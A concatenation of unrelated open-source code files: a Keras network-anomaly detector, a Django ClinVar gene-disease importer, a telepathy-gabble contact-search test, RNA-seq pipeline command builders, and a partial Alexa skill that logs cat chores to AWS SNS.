#{'term': {'src': destSiteOWDServer}},
#{'term': {'src': destSiteThroughputServer}}
]}
},
{'bool':
{'should':[
{'term': {'_type': 'packet_loss_rate'}},
#{'term': {'_type': 'latency'}},
#{'term': {'_type': ''}},
#{'term': {'_type': ''}}
]}
}
]
}
}
}
scroll = scan(client=es, index=indices, query=my_query)
#scan the data
count = 0
allData={} # will be like this: {'dest_host':[[timestamp],[value]], ...}
for res in scroll:
# if count<2: print(res)
if not count%100000: print(count)
if count>1000000: break
dst = res['_source']['dest'] # old data - dest, new data - dest_host
if dst not in allData: allData[dst]=[[],[]]
allData[dst][0].append(res['_source']['timestamp'] )
allData[dst][1].append(res['_source']['packet_loss'])
count=count+1
dfs=[]
for dest,data in allData.items():
ts=pd.to_datetime(data[0],unit='ms')
df=pd.DataFrame({dest:data[1]}, index=ts )
df.sort_index(inplace=True)
df.index = df.index.map(lambda t: t.replace(second=0))
df = df[~df.index.duplicated(keep='last')]
dfs.append(df)
#print(df.head(2))
print('docs read:', count)
if len(dfs)<2: return (job_id,0,0,2)
full_df = pd.concat(dfs, axis=1)
print(full_df.shape)
# fix NANs
full_df.fillna(0, inplace=True)
return (job_id, end, full_df, 0)
def scaled_accuracy(accuracy, ref_samples, sub_samples):
chance = float(ref_samples)/(ref_samples+sub_samples)
print('chance:', chance)
print('actual accuracy:', accuracy)
rescale = 1/(1 - chance)
return (accuracy-chance)*rescale
# create Network Model
class ANN(object):
def __init__(self, end, data):
self.n_series = data.shape[1]
self.df = data
self.lend = end
self.nn = Sequential()
self.nn.add(Dense(units=self.n_series*2, input_shape=(self.n_series,), activation='relu' ))
# self.nn.add(Dropout(0.5))
self.nn.add(Dense(units=self.n_series, activation='relu'))
# self.nn.add(Dropout(0.5))
self.nn.add(Dense(units=1, activation='sigmoid'))
# self.nn.compile(loss='hinge', optimizer='sgd', metrics=['binary_accuracy'])
# self.nn.compile(loss='mse',optimizer='rmsprop', metrics=['accuracy'])
self.nn.compile(loss='binary_crossentropy',optimizer='rmsprop', metrics=['accuracy'])
# self.nn.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['binary_accuracy'])
self.nn.summary()
def check_for_anomaly(self):
lstart = self.df.index.min()
# lend = self.df.index.max()
#round start
lstart.seconds=0
lstart.minutes=0
print(lstart, self.lend)
ti = self.lend - sub
# ti = lstart + ref
startt = time()
ref_df = self.df[ (self.df.index < ti)]
sub_df = self.df[(self.df.index >= ti)]
if ref_df.shape[0] < 32 or sub_df.shape[0]<32:
return -999
y_ref = pd.Series([0] * ref_df.shape[0])
X_ref = ref_df
y_sub = pd.Series([1] * sub_df.shape[0])
X_sub = sub_df
# separate Reference and Subject into Train and Test
X_ref_train, X_ref_test, y_ref_train, y_ref_test = train_test_split(X_ref, y_ref, test_size=0.3, random_state=42)
X_sub_train, X_sub_test, y_sub_train, y_sub_test = train_test_split(X_sub, y_sub, test_size=0.3, random_state=42)
# combine training ref and sub samples
X_train = pd.concat([X_ref_train, X_sub_train])
y_train = pd.concat([y_ref_train, y_sub_train])
# combine testing ref and sub samples
X_test = pd.concat([X_ref_test, X_sub_test])
y_test = pd.concat([y_ref_test, y_sub_test])
X_train = X_train.reset_index(drop=True)
y_train = y_train.reset_index(drop=True)
X_train_s, y_train_s = shuffle(X_train, y_train)
hist = self.nn.fit(X_train_s.values, y_train_s.values, epochs=100, verbose=0, shuffle=True, batch_size=10)
loss_and_metrics = self.nn.evaluate(X_test.values, y_test.values)#, batch_size=256)
print(loss_and_metrics)
print('\n',ti,"\trefes:" , ref_df.shape, "\tsubjects:", sub_df.shape, '\taccuracy:', loss_and_metrics)
print("took:", time()-startt)
return scaled_accuracy(loss_and_metrics[1], ref_df.shape[0], sub_df.shape[0])
# run it
while (True):
body={"doc": {"processed": "yes"}}
(job_id, timestamp, data, status) = getWorkload()
if status == 1:
print('All done.')
break
elif status == 2:
print('Not enough data.')
try:
es.update(index=alarm_index, doc_type=alarm_type, id=job_id, body=body)
except es_exceptions.TransportError as e:
print ('TransportError on not enough data update', e)
continue
elif status == 3:
print('Probably already done.')
else:
ann = ANN(timestamp, data)
rescaled_accuracy = ann.check_for_anomaly()
#update state and value
if rescaled_accuracy != -999: body['doc']['rescaled'] = rescaled_accuracy
try:
es.update(index=alarm_index, doc_type=alarm_type, id=job_id, body=body)
except es_exceptions.TransportError as e:
print ('TransportError on result update', e)
| gpl-3.0 | 5,875,079,378,249,073,000 | 32.440945 | 130 | 0.541912 | false | 3.496912 | true | false | false |
magdamagda/geny-chorobowe | geny_chorobowe/find_disease_genes/clinvar.py | 1 | 3242 | from urllib2 import urlopen
from datetime import datetime
from django.db import transaction
from models import *
import logging
logger = logging.getLogger(__name__)
sourcePath = "ftp://ftp.ncbi.nlm.nih.gov/pub/clinvar/gene_condition_source_id"
def updateDiseasesList():
#na poczatek wywalic wszystkie choroby z bazy
ClinvarDisease.objects.all().delete()
ClinvarSource.objects.all().delete()
ClinvarGene.objects.all().delete()
#i sciagnac wszystkie od nowa
req = urlopen(sourcePath)
data = req.read()
diseases = {}
genesDict = {}
genes = {}
sources = {}
lines = data.split("\n")
lines.pop(0)
for line in lines:
if len(line)>0:
pola = line.split("\t")
lastmod = datetime.strptime(pola[7], '%d %b %Y').strftime('%Y-%m-%d')
concept = pola[2]
sourceId = convertToIntIfPossible(pola[5])
diseases[concept]=[pola[3], sourceId, pola[6], lastmod] #concept : name, sourceID, mim, last_mod
if not concept in genesDict:
genesDict[concept] = []
genesDict[concept].append(pola[0])
genes[pola[0]] = pola[1] #id : name
if not sourceId == None:
sources[pola[5]]= pola[4] #id : name
#insert genes
with transaction.atomic():
for g in genes:
ClinvarGene.objects.create(GeneName = genes[g] , GeneID = g)
#insert sources
with transaction.atomic():
for s in sources:
ClinvarSource.objects.create(SourceName = sources[s] , SourceID = s)
#insert diseases
with transaction.atomic():
for d in diseases:
SourceID=None
if not diseases[d][1] is None:
source = ClinvarSource.objects.get(SourceID=diseases[d][1])
disease = ClinvarDisease(DiseaseName = diseases[d][0], Source = source, LastModified = diseases[d][3], ConceptID=d, DiseaseMIM = diseases[d][2] )
disease.save()
for gene in genesDict[d]:
disease.Genes.add(ClinvarGene.objects.get(GeneID = gene))
def getDiseasesFromDatabase(name=None, gene=None, fromDate=None, toDate=None, page=0, pageSize = 20):
diseases = ClinvarDisease.objects.all()
if not name is None and not name=="":
diseases = diseases.filter(DiseaseName__contains = name)
if not gene is None and not gene=="":
diseases = diseases.filter(Genes__GeneName = name)
if not fromDate is None and not fromDate=="":
diseases = diseases.filter(LastModified__gte = fromDate)
if not toDate is None and not toDate=="":
diseases = diseases.filter(LastModified__lte = toDate)
diseases=diseases.order_by('-LastModified')
offset = page*pageSize
diseases = diseases[offset : offset + pageSize + 1]
nextPage=False
if len(diseases) > pageSize:
nextPage = True
return diseases[0:20], nextPage
def convertToIntIfPossible(val):
try:
return int(val)
except Exception:
return None
def diseaseDetails(ID):
try:
disease = ClinvarDisease.objects.get(ConceptID = ID)
return disease
except Exception as e:
return None
def geneDetails(ID):
try:
gene = ClinvarGene.objects.get(GeneID = ID)
return gene
except Exception as e:
return None
def diseaseGenes(ID):
try:
disease = ClinvarDisease.objects.get(ConceptID = ID)
return disease.Genes.all()
except Exception as e:
return []
def geneDiseases(ID):
try:
gene = ClinvarGene.objects.get(GeneID = ID)
return gene.clinvardisease_set.all()
except Exception as e:
return [] | gpl-2.0 | -3,142,552,447,835,035,600 | 28.481818 | 148 | 0.710056 | false | 2.677126 | false | false | false |
mlundblad/telepathy-gabble | tests/twisted/search/ceci-nest-pas-un-serveur.py | 4 | 6299 | """
Tests requesting search channels to, and performing contact searches against,
fake servers which are broken in various ways.
"""
import dbus
from twisted.words.protocols.jabber.client import IQ
from twisted.words.xish import domish
from gabbletest import exec_test, send_error_reply, make_result_iq
from servicetest import (
call_async, unwrap, make_channel_proxy, EventPattern, assertDBusError
)
from pprint import pformat
import constants as cs
import ns
def call_create(q, conn, server):
"""
Calls CreateChannel for the given contact search server, and returns the IQ
stanza received by the server.
"""
request = dbus.Dictionary(
{
cs.CHANNEL_TYPE: cs.CHANNEL_TYPE_CONTACT_SEARCH,
cs.CONTACT_SEARCH_SERVER: server,
}, signature='sv')
call_async(q, conn.Requests, 'CreateChannel', request)
iq_event = q.expect('stream-iq', to=server, query_ns=ns.SEARCH)
return iq_event.stanza
def not_a_search_server(q, stream, conn):
iq = call_create(q, conn, 'notajud.localhost')
e = domish.Element((None, 'error'))
e['type'] = 'cancel'
e.addElement((ns.STANZA, 'service-unavailable'))
send_error_reply(stream, iq, e)
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.NOT_AVAILABLE, event.error)
def returns_invalid_fields(q, stream, conn):
iq = call_create(q, conn, 'broken.localhost')
result = make_result_iq(stream, iq)
query = result.firstChildElement()
for f in ["first", "shoe-size", "nick", "star-sign"]:
query.addElement(f)
stream.send(result)
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.NOT_AVAILABLE, event.error)
def returns_error_from_search(q, stream, conn):
server = 'nofunforyou.localhost'
iq = call_create(q, conn, server)
result = make_result_iq(stream, iq)
query = result.firstChildElement()
query.addElement("first")
stream.send(result)
event = q.expect('dbus-return', method='CreateChannel')
c = make_channel_proxy(conn, event.value[0], 'Channel')
c_search = dbus.Interface(c, cs.CHANNEL_TYPE_CONTACT_SEARCH)
call_async(q, c_search, 'Search', {'x-n-given': 'World of Goo'})
iq_event, _ = q.expect_many(
EventPattern('stream-iq', to=server, query_ns=ns.SEARCH),
EventPattern('dbus-signal', signal='SearchStateChanged'),
)
iq = iq_event.stanza
error = domish.Element((None, 'error'))
error['type'] = 'modify'
error.addElement((ns.STANZA, 'not-acceptable'))
error.addElement((ns.STANZA, 'text'), content="We don't believe in games here.")
send_error_reply(stream, iq, error)
ssc = q.expect('dbus-signal', signal='SearchStateChanged')
new_state, reason, details = ssc.args
assert new_state == cs.SEARCH_FAILED, new_state
assert reason == cs.PERMISSION_DENIED, reason
# We call stop after the search has failed; it should succeed and do nothing.
call_async(q, c_search, 'Stop')
event = q.expect('dbus-return', method='Stop')
c.Close()
def returns_bees_from_search(q, stream, conn):
server = 'hivemind.localhost'
iq = call_create(q, conn, server)
result = make_result_iq(stream, iq)
query = result.firstChildElement()
query.addElement("nick")
stream.send(result)
event = q.expect('dbus-return', method='CreateChannel')
c = make_channel_proxy(conn, event.value[0], 'Channel')
c_search = dbus.Interface(c, cs.CHANNEL_TYPE_CONTACT_SEARCH)
call_async(q, c_search, 'Search', {'nickname': 'Buzzy'})
iq_event, _ = q.expect_many(
EventPattern('stream-iq', to=server, query_ns=ns.SEARCH),
EventPattern('dbus-signal', signal='SearchStateChanged'),
)
iq = iq_event.stanza
result = IQ(stream, 'result')
result['id'] = iq['id']
result['from'] = iq['to']
result.addElement((ns.SEARCH, 'bees')).addElement('bzzzzzzz')
stream.send(result)
ssc = q.expect('dbus-signal', signal='SearchStateChanged')
new_state, reason, details = ssc.args
assert new_state == cs.SEARCH_FAILED, new_state
assert reason == cs.NOT_AVAILABLE, reason
# We call stop after the search has failed; it should succeed and do nothing.
call_async(q, c_search, 'Stop')
event = q.expect('dbus-return', method='Stop')
c.Close()
def disconnected_before_reply(q, stream, conn):
iq = call_create(q, conn, 'slow.localhost')
call_async(q, conn, 'Disconnect')
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.DISCONNECTED, event.error)
def forbidden(q, stream, conn):
iq = call_create(q, conn, 'notforyou.localhost')
e = domish.Element((None, 'error'))
e['type'] = 'cancel'
e.addElement((ns.STANZA, 'forbidden'))
send_error_reply(stream, iq, e)
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.PERMISSION_DENIED, event.error)
def invalid_jid(q, stream, conn):
iq = call_create(q, conn, 'invalid.localhost')
e = domish.Element((None, 'error'))
e['type'] = 'cancel'
e.addElement((ns.STANZA, 'jid-malformed'))
send_error_reply(stream, iq, e)
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.INVALID_ARGUMENT, event.error)
def really_invalid_jid(q, stream, conn):
request = dbus.Dictionary(
{
cs.CHANNEL_TYPE: cs.CHANNEL_TYPE_CONTACT_SEARCH,
cs.CONTACT_SEARCH_SERVER: 'this is literally bullshit',
}, signature='sv')
call_async(q, conn.Requests, 'CreateChannel', request)
# If the JID is actually malformed, we shouldn't even get as far as trying
# to talk to it.
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.INVALID_ARGUMENT, event.error)
def test(q, bus, conn, stream):
not_a_search_server(q, stream, conn)
returns_invalid_fields(q, stream, conn)
returns_error_from_search(q, stream, conn)
returns_bees_from_search(q, stream, conn)
forbidden(q, stream, conn)
invalid_jid(q, stream, conn)
really_invalid_jid(q, stream, conn)
disconnected_before_reply(q, stream, conn)
stream.sendFooter()
q.expect('dbus-return', method='Disconnect')
if __name__ == '__main__':
exec_test(test)
| lgpl-2.1 | -4,594,219,973,480,346,600 | 31.469072 | 84 | 0.662962 | false | 3.29618 | true | false | false |
adam-rabinowitz/ngs_python | scripts/RNASeq_Pipeline_EMBL/EMBL_RNASeq_Functions.py | 2 | 16201 | import collections
import itertools
import os
import re
def parseModuleFile(modulefile):
''' Function to parse module file.
Args:
modulefile (str)- Path to tab-delimited file containing module data.
The first and second columns are required and are the program and
the program path. Additional columns should list the modules
required for the program.
Returns:
pathDict (dict)- A dictionary where the key is the program and the
value is the path
moduleDict (dict)- A dictionary where the key is the program and the
value is a list of required modules.
'''
# Create output variables
pathDict = {}
moduleDict = {}
# Import each line as a list
with open(modulefile) as infile:
for line in infile:
linedata = line.strip().split('\t')
# Extract and store data
program = linedata[0]
path = linedata[1]
modules = linedata[2:]
pathDict[program] = path
moduleDict[program] = modules
# Return data
return(pathDict, moduleDict)
def parseSampleFile(samplefile):
''' Function to parse sample file.
Args:
samplefile (str)- Path to tab-delimited file containing sample data.
The first column is the sample name which will be used as a prefix
for all outut files. The second column should be the prefix for
the identification of FASTQ files. Additional columns should list
directories in which to search for FASTQ files.
Returns:
sampleDict (dict)- A collections ordered dictionary where the key
is the sample name and the value in a tuple where the first
element is the prefix and the second element is a list of
directories.
'''
# Create output variable
sampleDict = collections.OrderedDict()
prefixList = []
# Import each line of the file as list
with open(samplefile) as infile:
for line in infile:
linedata = line.strip().split('\t')
# Extract and store data
name = linedata[0]
prefix = linedata[1]
indirs = linedata[2:]
if len(indirs) < 1:
raise IOError('No input directores for {}'.format(name))
sampleDict[name] = (prefix, indirs)
prefixList.append(prefix)
# Check prefixes will identify unique files
for p1, p2 in itertools.permutations(prefixList, 2):
if p1.startswith(p2):
raise IOError("prefices '{}' and '{}' overlap".format(p1, p2))
# Return output
return(sampleDict)
def parseParameterFile(paramfile):
''' Function to parse parameter file
Args:
paramfile (str)- Path to tabdelimited paramter file.
Returns:
paramDict (dict)- An dictionary of all parameters for analysis.
'''
# Create and populate parameter file
paramDict = {}
with open(paramfile) as infile:
for line in infile:
# Skip comment lines
if line.startswith('#'):
continue
# Extract data and try type conversion
param, value = line.strip().split('\t')
try:
value = int(value)
except ValueError:
try:
value = float(value)
except ValueError:
pass
# Store data
paramDict[param] = value
# Return data
return(paramDict)
def parseIndexFile(indexfile):
''' Function to parse index file
Args:
paramfile (str)- Path to tabdelimited paramter file.
Returns:
paramDict (dict)- An dictionary of all parameters for analysis.
'''
# Create and populate index dictionary
indexDict = {}
with open(indexfile) as infile:
for line in infile:
# Extract data and try type conversion
param, value = line.strip().split('\t')
indexDict[param] = value
# Return data
return(indexDict)
def findFastq(prefix, dirList):
''' A function to identify FASTQ files from directories
using a supplied filename prefix
Args:
prefix (str)- Prefix of the FASTQ files to be found.
dirList (list)- A list of directories to search.
Returns:
read1 (list)- A list of read1 FASTQ files
read2 (list)- A list of read2 FASTQ files
'''
# Create variables to store results
read1 = []
read2 = []
# Create regular expression to find files
prefix = re.escape(prefix)
read1Pattern = re.compile(prefix + '.*?R1(_\\d{3}){0,1}\\.fastq.gz$')
# Loop through directories to find fastq files
for directory in dirList:
# Loop through file names and find read1 files
filenames = os.listdir(directory)
for f in filenames:
if re.match(read1Pattern, f):
read1.append(os.path.join(directory, f))
# Find and store matching read2 files
read2File, nsub = re.subn(
'R1(?=(_\\d{3}){0,1}\\.fastq.gz$)', 'R2', f)
if nsub != 1:
raise IOError('Could not generate read2 filename'\
' for %s' %(f))
if read2File in filenames:
read2.append(os.path.join(directory, read2File))
# Check output files and return
if len(read1) == 0:
raise IOError('{}: No FASTQ files found'.format(prefix))
if len(read2) and len(read1) != len(read2):
raise IOError('{}: Mixed single- and paired-end'.format(prefix))
return(read1, read2)
def createOutFiles(outdir, sample):
''' Function to create output files for analysis
Args:
outdir (str)- Path to output directory
sample (str)- Sample name
Returns
outDict (dict)- Dictionary of output files.
'''
# Create variable to store files
outfiles = {}
# Create output directories and output prefix
sampledir = os.path.join(outdir, sample)
if not os.path.isdir(sampledir):
os.mkdir(sampledir)
outprefix = os.path.join(sampledir, sample) + '.'
# Store directories, prefixes and job file
outfiles['prefix'] = outprefix
outfiles['outdir'] = sampledir
outfiles['slurm'] = outprefix + 'slurm'
# Create file names for processing FASTQ files
outfiles['cat1'] = outprefix + 'R1.fastq.gz'
outfiles['cat2'] = outprefix + 'R2.fastq.gz'
outfiles['trim1'] = outprefix + 'trim.R1.fastq.gz'
outfiles['trim2'] = outprefix + 'trim.R2.fastq.gz'
outfiles['fastqclog'] = outprefix + 'fastqc.log'
outfiles['trimlog'] = outprefix + 'cutadapt.metrics'
# Create file names for processing BAM files
outfiles['starbam'] = outprefix + 'Aligned.out.bam'
outfiles['starlog'] = outprefix + 'star.log'
outfiles['sortbam'] = outprefix + 'sort.bam'
outfiles['sortlog'] = outprefix + 'sort.log'
outfiles['mdupbam'] = outprefix + 'mdup.bam'
outfiles['mduplog1'] = outprefix + 'mdup.metrics'
outfiles['mduplog2'] = outprefix + 'mdup.log'
# Create output files for htseq
outfiles['htseqlog'] = outprefix + 'htseq.log'
outfiles['genecounts'] = outprefix + 'gene_counts.txt'
# Create file names for QC of BAM files
outfiles['metrlog1'] = outprefix + 'collectrna.metrics'
outfiles['metrlog2'] = outprefix + 'collectrna.log'
outfiles['alsumlog1'] = outprefix + 'alignsum.metrics'
outfiles['alsumlog2'] = outprefix + 'alignsum.log'
# Return data
return(outfiles)
def fastQC(inFile, outDir, path):
''' This function performs a FastQC analysis on a fastq file and
then organises the output data. Function is built for version 0.11.2
of FastQC. Function takes three arguments:
1) inFile - Input FASTQ file.
2) outDir - Output directory.
3) path - Path to FastQC; Default = 'fastqc'.
'''
# Extract sample name
name = re.search('([^/]+)\\.fastq(?:\\.gz){0,1}$',inFile).group(1)
# Create FastQC command and return it
fastqcCommand = '%s --extract -q -o %s %s && rm %s %s' %(
path,
outDir,
inFile,
os.path.join(outDir, name + '_fastqc.html'),
os.path.join(outDir, name + '_fastqc.zip')
)
# Execute or return command
return(fastqcCommand)
def cutadapt(
read1In, read1Out, read2In, read2Out, quality, adapter, length, path,
overlap, error
):
''' A function to create cutadapt command
Args:
read1In (str)- Path to read1 input file.
read1Out (str)- Path to read2 output file.
read2In (str)- Path to read2 input file.
read2Out (str)- Path to read2 output file.
quality (int)- Base quality score to use for trimming.
adapter (str)- Adapter to use for trimming.
length (int)- Minimum length of trimmed reads.
path (str)- Path for cutadapt program.
'''
# Check arguments
if not read2In is None and read2Out is None:
raise IOError('Output file must be supplied for 2nd read')
if not isinstance(length, int):
raise TypeError('length must be integer')
if length < 25:
raise ValueError('length must be >=25')
if not isinstance(overlap, int):
raise TypeError('overlap must be integer')
if not 1 <= overlap <= len(adapter):
raise ValueError('overlap must be >=1 and <= adapter length')
if not isinstance(error, (int, float)):
raise TypeError('error must be integer or float')
if not 0 <= error < 1:
raise ValueError('error must be >=0 and <1')
# Create single end argument
adapterList = adapter.split(',')
command = [path]
if read2In is None:
for a in adapterList:
command.extend(['-a', a])
command.extend([
'-o', read1Out, '-e', error, '-q', quality, '-m', length, '-O',
overlap, read1In])
else:
for a in adapterList:
command.extend(['-a', a, '-A', a])
command.extend([
'-o', read1Out, '-p', read2Out, '-e', error, '-q', quality, '-m',
length, '-O', overlap, read1In, read2In])
# Join and return command
command = ' '.join(map(str, command))
return command
def starAlign(
indexDir, outPrefix, read1, read2, threads, path, rg=1,
pl='uknown', lb='unknown', sm='uknown'
):
# Create output command
command = [path, '--runThreadN', threads, '--genomeDir', indexDir,
'--outFileNamePrefix', outPrefix, '--outSAMtype', 'BAM', 'Unsorted',
'--outSAMunmapped', 'Within', '--readFilesIn', read1]
if read2:
command.append(read2)
# Append read file command
if read1.endswith('.gz'):
if read2.endswith('.gz'):
command.extend(['--readFilesCommand', 'zcat'])
else:
raise ValueError('mixture of compressed and uncompressed files')
# Add read group information
if rg:
command.extend(['--outSAMattrRGline', 'ID:{}'.format(rg)])
if pl:
command.append('PL:{}'.format(pl))
if lb:
command.append('LB:{}'.format(lb))
if sm:
command.append('SM:{}'.format(sm))
# Concatenate commadn and return
command = ' '.join(map(str, command))
return(command)
def bamsort(
inFile, outFile, threads, memory, path
):
''' Function to create sort BAM commabd using samtools.
Args:
inFile (str)- Path to input file.
outFile (str)- Path to outfile.
threads (int)- Number of threads to use in sort.
memory (int)- Memory, in gigabytes, to use in each thread.
path (str)- Path to samtools executable.
Returns:
sortCommand (str)- Output command
'''
# Check input file
if not inFile.endswith('.bam'):
raise TypeError('Input file suffix must be .bam')
# Check output file
if not outFile.endswith('.bam'):
raise TypeError('Output file suffix must be .bam')
# Process memory argument
memory = str(memory) + 'G'
# Generate sort command
sortCommand = [path, 'sort', '-m', memory, '-@', str(threads),
'-o', outFile, '-T', outFile[:-4], '-O', 'BAM', inFile]
sortCommand = filter(None, sortCommand)
sortCommand = ' '.join(sortCommand)
# Delete input and index output
sortCommand += ' && {} index {}'.format(path, outFile)
sortCommand += ' && rm {}'.format(inFile)
# Return command
return(sortCommand)
def markDuplicates(
inBam, outBam, logFile, picardPath, memory
):
''' Function to mark duplicates using the picard toolkit.
Args:
inBam (str)- Full path to input BAM file.
outBam (str)- Full path to output BAM file.
logFile (str)- Full path to output log file.
picardPath (str)- Path to picard jar file.
memory (int)- Amount of memory in java heap in gigabytes.
Returns:
command (str)- Mark duplicates command
'''
# Create command
command = [
'java', '-jar', '-Xmx{}g'.format(memory), picardPath, 'MarkDuplicates',
'I=' + inBam, 'O=' + outBam, 'M=' + logFile, 'ASSUME_SORTED=true',
'CREATE_INDEX=true', 'REMOVE_DUPLICATES=false'
]
# Merge command, add deletion and return
command = ' '.join(command)
command += ' && rm {}*'.format(inBam[:-1])
return(command)
def rnaseqMetric(
bam, output, refflat, strand, rrna, path, memory
):
''' Function to generate command for picard CollectRNASeqMetrics
Args:
bam (str)- Path to input BAM file.
output (str)- Path to output file.
refflat (str)- Path to reflat file.
strand (str)- Strand: should be one none|forward|reverse.
Returns:
command (str)- CollectRnaSeqMetrics command.
'''
# Check strand argument
if strand == 'none':
strandArg = 'STRAND=NONE'
elif strand == 'forward':
strandArg = 'STRAND=FIRST_READ_TRANSCRIPTION_STRAND'
elif strand == 'reverse':
strandArg = 'STRAND=SECOND_READ_TRANSCRIPTION_STRAND'
else:
raise ValueError('strans must be one of none|forward|reverse')
# Build command
command = [
'java', '-jar', '-Xmx{}g'.format(memory), path, 'CollectRnaSeqMetrics',
'I=' + bam, 'O=' + output, 'REF_FLAT=' + refflat, strandArg,
'RIBOSOMAL_INTERVALS=' + rrna
]
# Join and return command
command = ' '.join(command)
return(command)
def alignMetrics(
bam, output, fasta, path, memory
):
''' Function to generate command for picard CollectAlignmentSummeryMetrics
Args:
bam (str)- Path to input BAM file.
output (str)- Path to output file.
fasta (str)- Path to FASTA file.
path (str)- Path to picard executable file.
memory (int)- Initial heap size in gigabytes.
Returns:
command (str)- CollectAlignmentSummaryMetrics command.
'''
# Create command
command = [
'java', '-jar', '-Xmx{}g'.format(memory), path,
'CollectAlignmentSummaryMetrics', 'R=' + fasta, 'I=' + bam,
'O=' + output
]
# Join and return command
command = ' '.join(command)
return(command)
def htseq(
bam, gtf, path, feature='exon', attrid='gene_id', mode='union',
stranded='reverse', mapq=10
):
# Check arguments
if not mode in ('union', 'intersection-strict', 'intersection-nonempty'):
raise ValueError('unrecognised mode')
if not stranded in ('yes', 'no', 'reverse'):
raise ValueError('unrecognised stranded argument')
if not isinstance(mapq, int):
raise TypeError('mapq not an integer')
if mapq < 0:
raise ValueError('mapq is negative')
# Create command
command = [path, '-f', 'bam', '-r', 'pos', '-s', stranded, '-t', feature,
'-i', attrid, '-m', mode, '-a', mapq, bam, gtf]
# Join and return command
command = ' '.join(map(str, command))
return(command)
| gpl-2.0 | -6,755,296,205,247,052,000 | 34.373362 | 79 | 0.596877 | false | 3.905738 | false | false | false |
jeffjet24/CatChores | alexa/lambda/CatChoreSkill.py | 1 | 11110 | from operator import itemgetter
import boto3
import json
from datetime import tzinfo, timedelta, datetime
snsClient = boto3.client('sns')
lambdaClient = boto3.client('lambda')
catEventSNS = "arn:aws:sns:us-east-1:818316582971:CatEvent"
catGetPerformedLambda = "arn:aws:lambda:us-east-1:818316582971:function:CatGetPerformed"
TIMEZONE_DIFFERENCE = timedelta(hours = -6)
# --------------- Helpers that build all of the responses ----------------------
def build_speechlet_response(title, output, reprompt_text, should_end_session):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'card': {
'type': 'Simple',
'title': "SessionSpeechlet - " + title,
'content': "SessionSpeechlet - " + output
},
'reprompt': {
'outputSpeech': {
'type': 'PlainText',
'text': reprompt_text
}
},
'shouldEndSession': should_end_session
}
def build_response(sessionAttributes, speechlet_response):
return {
'version': '1.0',
'sessionAttributes': sessionAttributes,
'response': speechlet_response
}
def getUser(given):
given = given.lower()
if given == "mac" or given == "mack":
return "Mack"
elif given == "autumn":
return "Autumn"
elif given == "david":
return "David"
elif given == "molly":
return "Molly"
elif given == "ben" or given == "been":
return "Ben"
def getActivity(given, cat):
given = given.lower()
if given == "cleaned":
return "DownstairLitter"
elif given == "vacuumed" or given == "vacuum":
return "Vacuum"
elif given == "emptied" or given == "empty":
return "DownstairLitter"
elif given == "clipped":
if cat == "millies" or cat == "millie" or cat == "milly":
cat = "Millie"
return cat + "Nails"
elif given == "fed":
# Add time (AM/PM) determining logic...
return "FeedAM"
# --------------- Functions that control the skill's behavior ------------------
def get_welcome_response():
card_title = "Welcome"
speech_output = "Welcome to the Cat Chores Alexa Skill!" \
"Please tell me what chore has been just been completed and who has completed it. "\
"Please say it in past tense."\
" You can also ask when a chore has last been done "
reprompt_text = "Please tell me what chore has been just been completed. "\
"Please say it in past tense."
should_end_session = False
return build_response({}, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = "Session Ended"
speech_output = "Thank you! Have a nice day!"
should_end_session = True
return build_response({}, build_speechlet_response(
card_title, speech_output, None, should_end_session))
def performChore(intent, session, event):
card_title = intent['name']
should_end_session = True
eventName = ""
actorName = getUser(event["request"]["intent"]["slots"]["User"]["value"])
if "value" in event["request"]["intent"]["slots"]["Cat"]:
catName = event["request"]["intent"]["slots"]["Cat"]["value"]
eventName = getActivity(event["request"]["intent"]["slots"]["Chore"]["value"], catName)
else:
eventName = getActivity(event["request"]["intent"]["slots"]["Chore"]["value"], "")
utc_dt = datetime.strptime(event["request"]["timestamp"], '%Y-%m-%dT%H:%M:%SZ') + TIMEZONE_DIFFERENCE
time = int((utc_dt - datetime(1970, 1, 1)).total_seconds())
if eventName == "FeedAM" and utc_dt.hour >= 12:
eventName = "FeedPM"
print("Completed Event: " + eventName)
post_message = {'name': actorName, "time": str(time), "event": eventName}
response = snsClient.publish(
TopicArn = catEventSNS,
Message = json.dumps({"name": actorName, "time": time, "event": eventName}))
print("Response: " + json.dumps(response, indent=2))
speech_output = "Thank You! That record has been added!"
return build_response({}, build_speechlet_response(
card_title, speech_output, "", should_end_session))
def getPerformedChore(intent, session, event):
card_title = intent['name']
latestChores = lambdaClient.invoke(
FunctionName = catGetPerformedLambda,
InvocationType = 'RequestResponse'
)
payload = latestChores['Payload'].read()
choresList = json.loads(json.loads(json.loads(payload)['body'])['Message'])
eventName = ""
if "value" in event["request"]["intent"]["slots"]["Cat"]:
catName = event["request"]["intent"]["slots"]["Cat"]["value"]
eventName = getActivity(event["request"]["intent"]["slots"]["Chore"]["value"], catName)
else:
eventName = getActivity(event["request"]["intent"]["slots"]["Chore"]["value"], "")
selecteditem = {}
if eventName != "FeedAM" and eventName != "FeedPM":
for task in choresList:
taskItem = task['item']
if taskItem['task'] == eventName:
selecteditem = task
break
else:
feedAMTask = {}
feedPMTask = {}
for task in choresList:
taskItem = task['item']
if taskItem['task'] == "FeedAM":
feedAMTask = task
elif taskItem['task'] == "FeedPM":
feedPMTask = task
if feedAMTask and feedPMTask:
break
if int(feedAMTask['item']['time']) < int(feedPMTask['item']['time']):
selecteditem = feedPMTask
else:
selecteditem = feedAMTask
if selecteditem:
lastTimeStamp = selecteditem['item']['time']
lastPerson = selecteditem['item']['personName']
lastStatus = selecteditem['status']
lastChore = selecteditem['item']['task']
lastDateTime = datetime.fromtimestamp(int(lastTimeStamp)) + TIMEZONE_DIFFERENCE
lastTime = lastDateTime.strftime("%I:%M%p")
lastDay = '{0:%A}, {0:%B} {0:%d}'.format(lastDateTime)
speech_output = ""
if lastChore == "FeedAM" or lastChore == "FeedPM":
speech_output = speech_output + "The cat was last fed by "
elif lastChore == "DownstairLitter":
speech_output = speech_output + "The downstairs litter was last emptied by "
elif lastChore == "UpstairLitter":
speech_output = speech_output + "The upstairs litter was last emptied by "
elif lastChore == "Vacuum":
speech_output = speech_output + "The carpet was last vacuumed by "
